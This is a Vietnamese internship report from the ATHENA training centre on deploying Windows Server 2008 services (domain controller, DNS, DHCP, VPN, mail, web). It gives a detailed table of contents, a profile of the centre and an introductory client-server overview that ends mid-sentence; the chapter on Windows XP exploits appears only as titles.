Nguyenthithuhien_baocaothuctap
description
Transcript of Nguyenthithuhien_baocaothuctap
TRUNG TẦM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ ATHENA
BÁO CÁO THỰC TẬP
NGHIÊN CỨU VÀ TRIỂN KHAI CÁC
DỊCH VỤ MẠNG TRÊN WINDOWS
SERVER 2008
TP. Hồ Chí Minh, Tháng 3 năm 2014.
GV Hướng Dẫn: Võ Đỗ Thắng
Sinh Viên: Nguyễn Thị Thu Hiền
MSSV: 1031102002
TRUNG TÂM ĐÀO TẠO MẠNG VÀ
AN NINH MẠNG QUỐC TẾ ATHENA
CÔNG HÒA XÃ HỘI CHỦ NGHĨA VIỆT NAM
Độc lâp – Tự do – Hạnh phúc
NHIỆM VỤ THỰC HIỆN KHÓA LUẬN
Họ tên SV : Nguyễn Thị Thu Hiền. MSSV: 1031102002.Chuyên ngành: Công Nghệ Thông Tin.Tên đề tài: Nghiên cứu triển khai các dịch vụ mạng trên Windows Server 2008.Nội dung thực hiện:Lý thuyết:Nắm vững các bước thực hiện quản trị Windows Server 2008.Có khả năng tự thiết lập một mạng máy tính, cấu hình mạng, điều chỉnh khả năng hoạt động mạng máy tính, vận hành hệ thống mạng, giải quyết sự cố, các phương pháp bảo vệ.Thực hành: Cài đặt Windows Server 2008.Nâng cấp Stand Alone thành Domain controller.Cài đặt Windows 7.Join Domain cho windows 7.Tạo user account trên AD, thiết lập policy cho phép User được quyền thay đổi ngày giờ hệ thống.Backup cho Domain Controller.Quản lý dịch vụ DNS, Mail, DHCP, Web, VPN trên môi trường Local và Internet.Thực hiện kết nối VPN, Mail Server, Web Server trên máy chủ ảo VPS.Bảo mật Windows với khai thác mã lỗi trên Windows Xp và trên VPS(MS10_042 , MS12_004.)Thời gian thực hiện: 24/02/2014 đến 4/4/2014.Chữ ký của SV:
TP.HCM, Ngày 3 tháng 3 năm 2014GIÁM ĐỐC TRUNG TÂM GIẢNG VIÊN HƯỚNG DẪN
(Ký và ghi rõ họ tên) (Ký và ghi rõ họ tên
LỜI CẢM ƠN
Trên thực tế không có sự thành công nào mà không gắn liền với những sự hỗ trợ, giúp đỡ dù ít hay nhiều, dù trực tiếp hay gián tiếp của người khác. Trong suốt thời gian từ khi bắt đầu học tập ở giảng đường đến nay, em đã nhận được rất nhiều sự quan tâm, giúp đỡ của quý Thầy Cô, gia đình và bạn bè. Với lời biết ơn sâu sắc nhất, em xin gửi đến quý Thầy Cô ở Khoa Công Nghệ Thông Tin - Trường Đại Học Công Nghệ Thông Tin Gia Định Thành Phố Hồ Chí Minh đã cùng với tri thức và tâm huyết của mình để truyền đạt vốn kiến thức quý báu cho chúng em trong suốt thời gian học tập tại trường. Và đặc biệt, trong học kỳ này Khoa đã tổ chức cho chúng em thực tập và được tiếp cận với môn học mà theo em là rất hữu ích đối với sinh viên ngành Công Nghệ Thông Tin.Em xin chân thành cảm ơn Thầy Võ Đỗ Thắng đã tận tâm hướng dẫn chúng em qua từng buổi thực tập tại Trung Tâm ATHENA cũng như những buổi nói chuyện, thảo luận. Nếu không có những lời hướng dẫn, dạy bảo của thầy thầy thì em nghĩ bài báo cáo này của em rất khó có thể hoàn thiện được. Một lần nữa, em xin chân thành cảm ơn thầy.Bài báo cáo được thực hiện trong khoảng thời gian gần 2 tháng. Bước đầu đi vào thực tế, tìm hiểu, kiến thức của em còn hạn chế và còn nhiều bỡ ngỡ. Do vậy, không tránh khỏi những thiếu sót là điều chắc chắn, em rất mong nhận được những ý kiến đóng góp quý báu của quý Thầy Cô và các bạn học cùng lớp để kiến thức của em trong lĩnh vực này được hoàn thiện hơn.Sau cùng, em xin kính chúc quý Thầy Cô trong Khoa Công Nghệ Thông Tin và Thầy Võ Đỗ Thắng thật dồi dào sức khỏe, niềm tin để tiếp tục thực hiện sứ mệnh cao đẹp của mình là truyền đạt kiến thức cho thế hệ mai sau.Trân trọng.
TP.HCM, Ngày 4 - 4 - 2014
Sinh viên thực hiện
Nguyễn Thị Thu Hiền.
MỤC LỤCCHƯƠNG 1: CÔNG VIỆC THỰC TẬP..................................................................9
I. Giới thiệu doanh nghiệp thực tập – Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.......................................9
1. Trụ sở và các chi nhánh:.............................................................10
1.1. Trụ sở chính:........................................................................10
1.2. Cơ sở 2_Tại TP Hồ Chí Minh:.............................................10
2. Quá trình hình thành và phát triển của trung tâm:......................10
3. Cơ cấu tổ chức:............................................................................12
4. Các sản phẩm, giải pháp:............................................................12
4.1 Các khóa học dài hạn:...........................................................12
4.2 Các khóa học ngắn hạn:........................................................12
4.3 Các sản phẩm khác................................................................13
4.4 Cơ sở hạ tầng.........................................................................13
4.5 Các dịch vụ hỗ trợ:................................................................13
5. Khách hàng..................................................................................14
6. Đối tác.........................................................................................14
II. CÁC NHIỆM VỤ VÀ DỊCH VỤ CỦA BỘ PHẬN THỰC TẬP. .14
III. CÔNG VIỆC VÀ NHIỆM VỤ ĐƯỢC PHÂN CÔNG.................14
IV. THỜI GIAN THỰC TẬP.............................................................14
CHƯƠNG 2: NÔI DUNG THỰC TẬP..................................................................14
I. Nhiệm vụ được giao.........................................................................14
II. Kiến thức tìm hiểu..........................................................................15
1. Giải pháp mạng doanh nghiệp.....................................................15
1.1. Giới thiệu về mạng doanh nghiệp........................................15
1.2. Các thành phần công nghệ trong mạng doanh nghiệp.........15
2. Windows Server 2008.................................................................15
Giới thiệu về mô hình Client-Server..............................................15
CHƯƠNG 3: TỔNG QUAN VỀ WINDOWS SERVER 2008...............................17
I. GIỚI THIỆU WINDOWS SERVER 2008......................................17
II. CÁC TÍNH NĂNG CỦA WINDOWS SERVER 2008................18
1. Công cụ quản trị Server Manager...............................................18
2. Windows Server Core.................................................................19
3. PowerShell..................................................................................19
4. Windows Deloyment Services....................................................20
5. Terminal Services........................................................................20
6. Network Access Protection.........................................................20
7. Read-Only Domain Controllers..................................................21
8. Công nghệ Failover Clustering...................................................21
9. Windows Firewall with Advance Security.................................22
III. MỘT SỐ TÍNH NĂNG MỚI CỦA WINDOWS SERVER 2008.............................................................................................................22
1. Công nghệ ảo hóa Hyper-V.........................................................22
2. Processor Compatibility Mode....................................................23
3. File Classification Infrastructure.................................................23
4. Quản lý trong ỗ đĩa và file:.........................................................23
5. Cải tiến giao thức và mã hóa.......................................................23
6. Một số tính năng khác.................................................................23
IV. CÁC LỢI ÍCH CỦA WINDOWS SERVER 2008......................24
1. Web.............................................................................................24
2. Ảo hóa :.......................................................................................24
3. Bảo mật:......................................................................................25
3.1. Network Access Protection (NAP):.....................................25
3.2. Read-Only Domain Controller (RODC):.............................25
3.3. BitLocker:............................................................................25
3.4. Windows Firewall:...............................................................26
V. CÁC PHIÊN BẢN CỦA WINDOWS SERVER 2008.................26
2. Windows Server 2008 Standard Edition.....................................26
3. Windows Server 2008 Enterprise Edition...................................26
4. Windows Server 2008 Datacenter Edition..................................27
5. Windows Web Server 2008........................................................27
CHƯƠNG 4: CÀI ĐẶT WINDOWS SERVER 2008............................................28
I. YÊU CẦU PHẦN CỨNG...............................................................28
II. CÁC CÁCH CÀI ĐẶT...................................................................28
III. NÂNG CẤP LÊN WINDOWS SERVER 2008............................29
IV. CÀI ĐẶT WINDOWS SERVER 2008........................................29
CHƯƠNG 5: DỰNG DOMAIN CONTROLLER.................................................35
CHƯƠNG 6: JOIN DOMAIN.................................................................................46
CHƯƠNG 7: TRIỂN KHAI CÁC DỊCH VỤ MẠNG...........................................49
I. DỊCH VỤ DNS................................................................................49
1. Giới thiệu về DNS.......................................................................49
2. Cài đặt DNS................................................................................50
3. Cấu hình DNS.............................................................................51
II. GIỚI THIỆU DỊCH VỤ DHCP.....................................................60
1. Hoạt động của giao thức..............................................................60
2. Cài đặt trên windows server 2008..............................................60
3. Cấu hình DHCP...........................................................................65
3.1. Tạo Scop..............................................................................65
3.2 Thay đổi options của Scope..................................................67
CHƯƠNG 8: BACKUP..........................................................................................68
Backup với Windows Server Backup......................................................................69
Cài đặt Windows Server Backup.............................................................................69
1. Cài đặt Windows Server Backup sử dụng Server Manager........69
2. Cài đặt Windows Server Backup sử dụng Servermanagercmd.exe.........................................................................................................73
3. Cài đặt Windows Server Backup sử dụng PowerShell...............73
4. BACKUP windows thông thường...............................................74
CHƯƠNG 9: IIS-WEB-FTP..................................................................................90
I. Tiến hành cài đặt web iis và FTP.....................................................90
II. cấu hình Web IIS............................................................................94
III. cấu hình FTP.................................................................................98
CHƯƠNG 10: MAIL............................................................................................107
I. Chuẩn bị:........................................................................................107
II. Tiến hành cài đặt MDeamon v10.................................................107
III. tiến hành gửi nhận mail...............................................................112
CHƯƠNG 11: MÔ HÌNH MULTIMASTER.......................................................120
I. Replication Multimaster.(..............................................................120
II. cấu hình Multimaster....................................................................121
1. chuẩn bị.....................................................................................121
2. cấu hình.....................................................................................121
3. join domain PC2 vào PC1.........................................................122
3. tiến hành nâng cấp domain cho PC1.........................................128
4. Kiểm tra đồng bộ PC2 và PC1..................................................136
CHƯƠNG 12: TRIỂN KHAI VPN.......................................................................138
I. Tìm hiểu VPN................................................................................138
1. Khái niệm..................................................................................139
2. Các loại VPN.............................................................................140
3.Bảo mật trong VPN....................................................................140
4.Sản phẩm công nghệ dành cho VPN..........................................141
5. Bộ xử lý trung tâm VPN...........................................................142
6. Router dùng cho VPN...............................................................142
7. Tường lửa PIX của Cisco..........................................................142
II. VPN client to site..........................................................................143
1. Cài đặt.......................................................................................143
III.VPN SITE TO SITE.....................................................................163
1. chuẩn bị:....................................................................................163
2. Đặt IP cho 4 máy.......................................................................163
3. Tiến hành cấu hình trên 2 server...............................................165
4. Kiểm tra.....................................................................................193
CHƯƠNG 13: TRIỂN KHAI VPN TRÊN VPS...................................................193
I. Cấu hình VPN................................................................................193
II. Cài đặt VPN cho client.................................................................200
1. Client xp1..................................................................................200
2. Client xp 2.................................................................................206
III. Kiểm tra.......................................................................................212
CHƯƠNG 14: MAIL TRÊN VPS.........................................................................212
I. Cài đặt MDmoon v10....................................................................212
II. Cấu hình MDmoon v10................................................................212
1. khởi động MDmoon v10...........................................................212
2. Kiểm tra Domain.......................................................................213
3. Tạo Account..............................................................................214
CHƯƠNG 15: WEB TRÊN VPS..........................................................................218
I. Cài đặt............................................................................................218
1. Chạy xampp..............................................................................218
2. Tạo xampp.................................................................................222
II. thiết kế web: nguyenthithuhien.tk/athena.....................................223
CHƯƠNG 16: THIẾT KẾ WEB BẰNG JOOMLA.............................................228
1. Cài đặt joomla...........................................................................228
2. thiết kế trang chủ.......................................................................231
3. Tạo template admin...................................................................235
4. Tạo bài viết................................................................................236
5.Tạo menu....................................................................................239
6. Hướng dẫn đưa manu ra trang chủ............................................243
7. Cài đặt và hiển thị module trình diển ảnh.................................245
8. Cài đặt và hiển thị tin tức cập nhật............................................249
9. Cập nhật tin tức cho website.....................................................250
10. Cài đặt và hiển thị tin tức mới nhất.........................................253
11. Hiển thị doanh mục tin tức......................................................256
12. Tạo thư mục hỗ trợ Online......................................................261
13. Tạo thư mục địa chỉ cho Athena............................................263
CHƯƠNG 17: BẢO MẬT WINDOWS................................................................264
I. Khai thác lỗ hổng trên Windows XP với mã lỗi MS10_042.........264
II. Khai thác lỗ hổng bảo mật Win XP mã lỗi MS12_004................270
CHƯƠNG 18: KẾT LUẬN...................................................................................275
I.Các kết quả đạt được.......................................................................275
II. Kinh nghiệm thực tế.....................................................................275
III. Hoàn thiện bản thân....................................................................276
IV. Các kiến thức được lĩnh hội........................................................276
V. Kết luận........................................................................................276
VI. Tài liệu tham khảo......................................................................277
LỜI MỞ ĐẦU
Ngày nay với sự phát triển của khoa học kỹ thuật thì máy tính trở nên phổ biến với mọi người. Chúng mang lại cho con người khả năng to lớn và làm những công việc phi thường: tính toán nhanh và chính xác các bài toán phức tạp, điều khiển tự động, giải trí… Máy tính ra đời không chỉ hỗ trợ trong sản xuất mà còn trong việc học tập và làm góp phần giải phóng sức lao động. Máy tính điện tử là một phát minh, thành tựu to lớn cho sự phát triển của nhân loại góp phần thúc đẩy mạnh mẽ tiến bộ khoa học và kỹ thuật nói riêng cũng như nhân loại nói chung.
Bên cạnh sự phát triển chóng mặt của máy tính trong thời buổi công nghệ thông tin thì các ứng dụng, dịch vụ mạng là nền tản không thể tách rời. Sức mạnh máy tính có thể nhân lên gấp nhiều lần khi được kết nối thành mạng máy tính. Là cơ sở hạ tần cho phép trao đổi thông tin, truyền tải dữ liệu từ xa nhằm rút ngắn khoảng cách. Với mạng máy tính toàn cầu chúng ta dễ dàng tiếp cận với sự phát triển của thế giới trong đó có sự phát triển gần nhất của Windows Server là Windows Server 2000 và Windows Server 2003 và tiếp đến là Windows Server 2008 hỗ trợ tốt các dịch vụ mạng cần thiết trên Server, việc cải tiến không ngừng giúp nâng cao tính ổn định và an toàn hơn cho Windows Server 2008 hoạt động một cách trơn tru.
Hiện nay quá trình công nghiệp hóa hiện đại hóa đất nước là một chủ trương hàng đầu của nhà nước. Mạng máy tính trở thành mục tiêu nghiên cứu và phát triển. Cốt lõi là ngành công nghệ thông tin bao gồm nhiều lĩnh vực từ kiến trúc mạng đến nguyên lý thiết kế, cài đặt mô hình ứng dụng v.v… Mạng viễn thông nói chung và mạng máy tính trên nền tảng Windows Server 2008 nói riêng là công cụ hũu dụng không thể thiếu trong bộ máy nhà nước, trường học, doanh nghiệp… Nó đóng vai trò cầu nối trao đổi thông tin giữa các chính phủ, tổ chức xã hội và mọi người với nhau.
Qua thời gian học tập và nghiên cứu trên ghế nhà trường cùng với sự hỗ trợ tận tình của Thầy cô, bạn bè và người thân đã giúp em thu thập được nhiều kiến thức quý báo. Đặc biệt là quá trình thực tập tại Trung tâm ATHENA giúp em có những trải nghiệm vô cùng thú vị và bổ ích. Với mong muốn tìm hiểu về mạng máy tính và góp phần xây dựng một mạng máy tính thân thiện, thông minh cho mọi người sử dụng.
Tuy đã có nhiều cố gắng song không thể tránh những khuyết điểm, sai sót vì thế mong được sự thông cảm và những ý kiến đóng góp quý báo từ Quý Thầy Cô, bạn bè, bạn đọc, người thân để em có thể ngày một hoàn thiện bản thân mình hơn. Xin chân thành cảm ơn!
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
CHƯƠNG 1: CÔNG VIỆC THỰC TẬP.
I. Giới thiệu doanh nghiệp thực tập – Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA_Tiền
thân là Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, (tên thương hiệu viết
tắt là TRUNG TÂM ĐÀO TẠO ATHENA), được chính thức thành lập theo giấy phép
kinh doanh số 4104006757 của Sở Kế Hoạch Đầu Tư Tp Hồ Chí Minh cấp ngày 04 tháng
11 năm 2008.
Tên công ty viết bằng tiếng nước ngoài: ATHENA ADVICE TRAINING
NETWORK SECURITY COMPANY LIMITED.
ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt
huyết và kinh nghiệm trong lĩnh vực công nghệ thông tin. Với quyết tâm góp phần vào
công cuộc thúc đẩy tiến trình tin học hóa của nước nhà. ATHENA đã và đang tập trung
chủ yếu vào các họat động sau:
Đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH,... Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính..Qua đó cung cấp nguồn nhân lực trong lĩnh vực công nghệ thông tin, đặc biệt là chuyên gia về mạng máy tính và bảo mật mạng đạt trình độ quốc tế cho các tổ chức, doanh nghiệp có nhu cầu.
Tư vấn và hổ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động sản xuất
kinh doanh.
Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển cơ sở dữ
liệu thông tin về các ứng dụng và sự cố mạng.
Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trường hợp xảy ra sự cố
máy tính.
Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,…
9Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Ngoài ra, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ Chí Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự...
1. Trụ sở và các chi nhánh:
1.1. Trụ sở chính: Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.
Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam.
Điện thoại: ( 84-8 ) 3824 4041
Hotline: 0943 23 00 99.
1.2. Cơ sở 2_Tại TP Hồ Chí Minh: Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA
92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam.
Website: www.Athena.Edu.Vn
Điện thoại: ( 84-8 ) 2210 3801
Hotline: 0943 20 00 88.
2. Quá trình hình thành và phát triển của trung tâm:
Một nhóm các thành viên là những doanh nhân tài năng và thành công trong lĩnh vực công nghệ thông tin đã nhận ra tiềm năng phát triển của việc đào tạo nền công nghệ thông tin nước nhà. Họ là những cá nhân có trình độ chuyên môn cao và có đầu óc lãnh đạo cùng với tầm nhìn xa về tương lai của ngành công nghệ thông tin trong tương lai, họ đã quy tụ được một lực lượng lớn đội ngũ công nghệ thông tin trước hết là làm nhiệm vụ ứng cứu máy tính cho các doanh nghiệp, cá nhân có nhu cầu. Bước phát triển tiếp theo là vươn tầm đào đạo đội ngũ cán bộ công nghệ thông tin cho đất nước và xã hội. Các thành viên sáng lập trung tâm gồm:
Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính Athena, hiện tại là giám đốc dự án của công ty Siemen Telecom.
Ông Hứa Văn Thế Phúc: Phó Giám đốc Phát triển Thương mại Công ty EIS, Phó Tổng công ty FPT.
Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hàng Liên Việt, chịu trách nhiệm công nghệ thông tin của Ngân hàng.
Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và an ninh mạng Athena.
Đến năm 2003, bốn thành viên sáng lập cùng với với đội ngũ ứng cứu máy tính gần 100 thành viên hoạt động như là một nhóm, một tổ chức ứng cứu máy tính miền Nam.
10Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Từ năm 2004- 2006: Trung tâm có nhiều bước phát triển và chuyển mình. Trung
tâm trở thành một trong những địa chỉ tin cậy của nhiều doanh nghiệp nhằm cài đặt hệ
thống an ninh mạng và đào tạo cho đội ngũ nhân viên của các doanh nghiệp về các
chương trình quản lý dự án MS Project 2003, kỹ năng thương mại điện tử, bảo mật
web… và là địa chỉ tin cậy của nhiều học sinh_sinh viên đến đăng kí học. Đòi hỏi cấp
thiết trong thời gian này của Trung tâm là nâng cao hơn nữa đội ngũ giảng viên cũng như
cơ sở để đáp ứng nhu cầu ngày càng cao về công nghệ thông tin của đất nước nói chung,
các doanh nghiệp, cá nhân nói riêng.Năm 2004, công ty mở rộng hoạt động cung cấp giải
pháp, dịch vụ cho khu vực miền Trung thông qua việc thành lập văn phòng đại diện tại
Đà Nẵng.
Đến năm 2006: Trung tâm đào tạo quản trị và an ninh mạng Athena mở ra thêm
một chi nhánh tại Cư xá Nguyễn Văn Trỗi. Đồng thời tiếp tục tuyển dụng đội ngũ giảng
viên là những chuyên gia an ninh mạng tốt nghiệp các trường đại học và học viện công
nghệ thông tin uy tín trên toàn quốc, đồng thời trong thời gian này Athena có nhiều chính
sách ưu đãi nhằm thu hút đội ngũ nhân lực công nghệ thông tin lành nghề từ các doanh
nghiệp, tổ chức, làm giàu thêm đội ngũ giảng viên của trung tâm.
Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh mạng mọc lên, cùng với khủng hoảng kinh tế tài chính toàn cầu đã làm cho Trung tâm rơi vào nhiều khó khăn. Ông Nguyễn Thế Đông cùng Ông Hứa Văn Thế Phúc rút vốn khỏi công ty gây nên sự hoang man cho toàn bộ hệ thống trung tâm. Cộng thêm chi nhánh tại Cư xã Nguyễn Văn Trỗi hoạt động không còn hiệu quả phải đóng cửa làm cho trung tâm rơi từ khó khăn này đến khó khăn khác. Lúc này, với quyết tâm khôi phục lại công ty cũng như tiếp tục sứ mạng góp phần vào tiến trình tin học hóa của đất nước. Ông Võ Đỗ Thắng mua lại cổ phần của hai nhà đầu tư lên làm giám đốc và xây dựng lại trung tâm. Đây là một bước chuyển mình có ý nghĩa chiến lược của trung tâm. Mở ra một làn gió mới và một giai đoạn mới, cùng với quyết tâm mạnh mẽ và một tinh thần thép đã giúp ông Thắng vượt qua nhiều khó khăn ban đầu, giúp trung tâm đứng vững trong thời kì khủng hoảng. Từ năm 2009 – nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến lược. Trung tâm đào tạo quản trị và an ninh mạng dần được phục hồi và trở lại quỹ đạo hoạt động của mình. Đến nay, Trung tâm đã trở thành một trong những trung tâm đào tạo quản trị mạng hàng đầu Việt Nam. Cùng với sự liên kết của rất nhiều công ty, tổ chức doanh nghiệp,
11Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
trung tâm trở thành nơi đào tạo và cung cấp nguồn nhân lực công nghệ thông tin cho xã hội. Từng bước thực hiện mục tiêu góp phần vào tiến trình tin học hóa nước nhà. 3. Cơ cấu tổ chức:
Hình 1. Sơ đồ tổ chức công ty.
4. Các sản phẩm, giải pháp:
4.1 Các khóa học dài hạn:- Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network security
specialist.
- Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork security Technician.
- Chuyên viên quản trị mạng nâng cao (ANMA) Athena network manager Administrator.
4.2 Các khóa học ngắn hạn:Khóa Quản trị mạng :
- Quản trị mạng Microsoft căn bản ACBN
- Phần cứng máy tính, laptop, server
- Quản trị hệ thống mạng Microsoft MCSA Security.
- Quản trị mạng Microsoft nâng cao MCSE
- Quản trị window Vista
- Quản trị hệ thống Window Server 2008, 2012
12Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
- Lớp Master Exchange Mail Server
- Quản trị mạng quốc tế Cissco CCNA
- Quản trị hệ thống mạng Linux 1 và Linux 2.
Khóa thiết kế web và bảo mật mạng- Xây dựng, quản trị web thương mại điện tử với Joomla và VirtuMart
- Lập trình web với Php và MySQL
- Bảo mật mạng quốc tế ACNS
- Hacker mũ trắng
- Athena Mastering Firewall Security
- Bảo mật website.
4.3 Các sản phẩm khác- Chuyên đề thực hành sao lưu và phục hồi dữ liệu
- Chuyên đề thực hành bảo mật mạng Wi_Fi
- Chuyên đề Ghost qua mạng
- Chuyên đề xây dựng và quản trị diễn đàn
- Chuyên đề bảo mật dữ liệu phòng chống nội gián
- Chuyên đề quản lý tài sản công nghệ thông tin
- Chuyên đề kỹ năng thương mại điện tử.
4.4 Cơ sở hạ tầng- Thiết bị đầy đủ và hiện đại.
- Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những công nghệ mới
nhất.
- Phòng máy rộng rãi, thoáng mát.
4.5 Các dịch vụ hỗ trợ:- Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn
- Giới thiệu việc làm cho mọi học viên
- Thực tập có lương cho học viên khá giỏi
- Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không giới hạn thời
gian
13Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
- Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy tính, mạng
máy tính, bảo mật mạng
Hỗ trợ thi Chứng chỉ Quốc tế.
5. Khách hàng
- Mọi đối tượng chuyên hoặc không chuyên về CNTT.- Khách hàng chủ yếu của ATHENA là các bạn học sinh, sinh viên và các cán bộ công
nhân viên chức yêu thích lĩnh vực công nghệ thông tin.
6. Đối tác
Trung tâm đào tạo an ninh mạng ATHENA là đối tác đào tạo & cung cấp nhân sự CNTT, quản trị mạng , an ninh mạng chất lượng cao theo đơn đặt hàng cho các đơn vị như ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính...
II. CÁC NHIỆM VỤ VÀ DỊCH VỤ CỦA BỘ PHẬN THỰC TẬP
Bộ phận thực tập : Bộ phận triển khai kỹ thuật.
Nhiệm vụ và dịch vụ:
Triển khai lắp đặt hệ thống mạng.
Bảo trì hệ thống mạng.
Tư vấn hỗ trợ quản trị hệ thống mạng.
III. CÔNG VIỆC VÀ NHIỆM VỤ ĐƯỢC PHÂN CÔNG
Nghiên cứu các dịch vụ mạng trên Windows Server 2008.
Triển khai các dịch vụ mạng trên Windows Server 2008.
Yêu cầu nhiệm vụ: Có kiến thức tốt về Network, System, Security.
IV. THỜI GIAN THỰC TẬP
Từ ngày 24/02/2014 đến ngày 04/04/2014.
CHƯƠNG 2: NÔI DUNG THỰC TẬP.
I. Nhiệm vụ được giao. Nghiên cứu các dịch vụ mạng trên Windows Server 2008
Triển khai các dịch vụ mạng trên Windows Server 2008
14Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
II. Kiến thức tìm hiểu
1. Giải pháp mạng doanh nghiệp
1.1. Giới thiệu về mạng doanh nghiệpHệ thống mạng của doanh nghiệp đơn giản hay phức tạp là tùy theo quy mô và
loại hình của doanh nghiệp. Ngày nay, các nhà cung ứng đã đưa ra rất nhiều sự chọn lựa
cho doanh nghiệp như cho phép doanh nghiệp tự trang bị, tự quản lý hoặc sử dụng dịch
vụ. Những doanh nghiệp lớn với hàng ngàn máy tính cũng có những giải pháp quản lý
đặc thù kết hợp cả phần cứng và phần mềm.
Hầu hết các doanh nghiệp đều có nhu cầu sử dụng các ứng dụng công nghệ thông tin
(CNTT) ở những mức độ khác nhau. Do vậy, họ sẽ có những nhu cầu khác nhau về quản
trị hệ thống mạng (network) của doanh nghiệp. Một hệ thống được kiểm soát tốt sẽ làm
giảm đáng kể chi phí hoạt động, nâng cao hiệu quả cũng như độ tin cậy của hệ thống.
1.2. Các thành phần công nghệ trong mạng doanh nghiệpTùy vào qui mô lớn hay nhỏ của doanh nghiệp mà ta sẽ có những giải pháp công
nghệ và thiết kế sao cho phù hợp nhất.
Hiện nay, hầu hết các ứng dụng mới đều yêu cầu rất nhiều tài nguyên của hệ thống và
băng thông mạng, cũng như các yêu cầu về điều khiển, giám sát mạng. Vậy làm thế nào
để một doanh nghiệp vừa và nhỏ, với một số vốn đầu tư ban đầu hạn chế, có thể tiếp cận
được với các công nghệ hiện đại, bắt kịp sự phát triển của thế giới.
2. Windows Server 2008
Giới thiệu về mô hình Client-Server
Điều đáng ngạc nhiên là nhiều công ty ngày nay vẫn không quan tâm đến việc
thực hiện một mạng lưới client/server. Thay vào đó họ chỉ tiếp tục thêm vào các máy
trạm để thực hiện mô hình mạng peer-to-peer. Mạng peer-to-peer không cung cấp cho
bạn nhiều cách bảo mật và chia sẽ tài nguyên. Vì vậy, không có gì ngạc nhiên khi họ
thường có vấn đề với việc truy cập vào máy trạm, bị mất dữ liệu do virus, spyware hay
phải trải nghiệm việc internet bị gián đoạn. Máy tính nối mạng theo mô hình peer-to-peer
là đủ khi bạn chỉ có một vài người dung trên mạng, nhưng khi có nhiều hơn 5 hoặc 6
người sử dụng trên mạng của bạn, bạn thực sự phải xem xét đầu tư một máy chủ mạng.
15Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Vậy lợi ích của mô hình Client-Server cụ thể là gì?
- Tập tin và an ninh mạng: Vai trò quan trọng nhất của một máy chủ tập tin là an ninh
mạng mà nó cung cấp. Bằng cách tạo ra các tài khoản người dùng cá nhân và nhóm, có
thể cấp quyền cho nhóm và cá nhân khai thác dữ liệu được lưu trữ trên mạng, ngăn chặn
người sử dụng trái phép truy cập tài liệu mà họ không nên xem. Ví dụ, trong Folder
chung thì group ketoan và group nhansu có quyền truy cập ủa nhân viên…
- Tăng độ tin cậy, giảm sự gián đoạn công việc: Nhiều máy chủ được trang bị nguồn
điện dự phòng. Với một nguồn cung cấp năng lượng thứ cấp chạy song song, sự mất mát
